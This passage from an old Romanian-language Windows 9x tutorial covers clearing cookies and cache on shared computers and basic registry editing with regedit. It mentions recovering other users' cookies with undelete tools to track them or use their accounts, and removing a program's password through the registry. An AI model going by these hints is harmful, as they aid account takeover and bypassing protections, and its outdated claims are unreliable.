In concluzie: daca veti sterge sistematic entries-urile, disk cache-ul si cookies-urile la computerele la care lucrati dar care nu va apartin, atunci nu veti avea probleme.
Exista desigur exceptii...... Daca cineva va dori neaparat sa va urmareasca activitatea, site-urile, sa se foloseasca de accounturile voastre cu ajutorul cookies-urilor, atunci el va putea sa faca asta daca va avea pachetul Norton Utilities pe hard-disk spre exemplu... Cu Norton Unerase el va putea obtine cookies-urile, fisierele html, jpg, gif care s-au aflat in disk cache... Asigurati-va ca nu se gaseste nimica din toate astea pe computer. Totusi, chiar daca nu exista nimica din toate astea, persoana care are acces la acelasi computer de care v-ati folosit, va putea inscrie pe computer asa fel de programe sau va putea folosi aceste programe de pe floppy..... Atunci chiar nu mai aveti ce face... Mai ales daca la computerul de care v-ati folosit poate fi folosit de oricine (Intr-o Internet Cafe de exemplu).
Cam slut cu securitatea daca va folositi de acest Windows. Asa ceva nu se tolereaza la Unix = va asigur. Doar Root-ul - sysadmin-ul va putea sti cu ce va ocupati.

CONCLUZIE: Renuntati la soft-urile MS-ului. Puneti-va Linux. Va sfatui sa o faceti cu o destula seriozitate.


--------------------------------------------------------------------------------
5.The Registry
Registrul este miezul sistemului de operare. Daca umblati unde nu trebuie, s-ar putea sa fie nevoie sa va reinstalati sistemul de operare, asa ca pregatiti diskul cu pograma de instalare si tineti-l linga voi. Insa trebuie sa stiti ca daca aveti acces la registru, atunci controlati intregul computer. Controlul asupra registrului este echivalent cu drepturile de root asupra unui computer cu Unix pe dinsul.
Pentru a deschide registrul apasati pe "Start" -> Run si scriti "regedit". Sau duceti-va la C:\windows\regedit.exe.
Cind veti deschide registrul veti vedea urmatoarele in frame-ul din partea stinga:

HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA

Cei de la Microsoft cred in securitate cu obscuritate. Ei cred ca vor tine departe utilizatorii de editarea registrului daca registrului i-au dat un nume ciudat si daca va sta in windows directory-ul.
Aici veti afla mai multe despre registru si va veti invinge frica ce tine de editarea lui.
Registrul controleaza tot ce tine de sistemul de operare: de la modul in care arata desktop-ul, pina la depozitarea Internet Dial Up password-ului cu care aveti acces la Net.
In primul rind trebuie sa umblati prin "hives-uri" (cele de mai sus se numesc hives-uri). Sigur, nu incercati sa stergeti nimic de acolo. Pentru a vedea diferite submenu-uri, apasati pe "+"-ul de la fiecare hive. Numele submenu-urilor va vor da de inteles cu ce aveti de a face. Foarte mult va sfatui sa nu stergeti nimic din ceea ce vedeti. Dupa ce ati navigat un timp si v-ati lamurit ce si cum, e timpul sa trecem la treaba.
Sa zicem ca doriti sa schimbati modul in care lucreaza un software anumit sau daca doriti sa remove-inguiti o parola a unui anumit program, puteti sa va uitati la acel software sub meniul software-ului. Faceti click la HKEY_CURRENT_USER. Apoi alegeti submeniul Software. Veti vedea o lista de software-uri in partea stinga. In partea dreapta veti vedea un fel de "data" pe care nu-l puteti intelege. Pentru a converti din forma pe care nu o intelegeti intr-una pe care sa o puteti intelege usor, si s-o puteti schimba, apasati pe anumitul menu sau topic pe care vreti sa-l schimbati intr-o "forma citibila"; dupa ce ati apasat anume pe acela pe care vreti sa-l schimbati, va duceti la Registry heading pe Regedit menu bar. Dupa ce ati apasat pe "Registry", va duceti la "Export Registry File". Va va intreba numele si path-ul unde doriti sa-l export-ati; introduceti un nume la alegerea voastra.
Dupa asta deschideti wordpad-ul si porniti fisierul pe care l-ati exportat in registru. Fisierul trebuie sa aiba extensia "reg". Va veti da seama acum ca sunteti in stare sa intelegeti cu mult mai multe si ca a devenit foarte usor sa editati entries-urile si sa-l customize-inguiti.

Exista o sumedenie de registry tricks-uri pe care le puteti folosi pentru a va imbunatati performanta PC-ului, care pot fi folosite pentru a schimba modul in care arata Windows-ul. Citeva destul de folosite sunt:

1. In loc de cuvintul "Start" scris la start button-ul, puteti sa va scrieti numele sau orice alt cuvint doriti.
2. Schimbati Internet Explorer Logo-ul.
3. Scimbati numele Recycle Bin-ului.
4. Mariti viteza computerului.
......... si multe, multe altele.

Exista asa de multe, incit un website intreg a fost dedicat informatiei despre registru. Trebuie sa va duceti la

http://www.regedit.com/- site dedicat intr-u totul registrului din Windows. Gasiti acolo destule lucruri uimitoare legate de "registry hacks".

Referitor la registru. Daca doriti sa cunoasteti totul despre registru, imi cereti Windows Registry Guide-ul v. 1.3 pe care-l am la mine. Este vorba despre reghelp.hlp, pe care-l am impreuna cu alte 3 fisiere: reghelp.cnt, license.txt si readme.txt. Impreuna se afla aceste 4 fisiere in directoria Reghelp. Daca o doriti mi-o cereti arhivata de vreo 200 kb. Ma contactati la adresa: picardul@softhome.net.
In felul acesta veti avea toate informatiile la voi pe PC si nu va trebui sa va conectati de fiecare data la internet cind veti dori sa aflati un nou trick.

Well fellow that is all for now and Happy Hacking!!!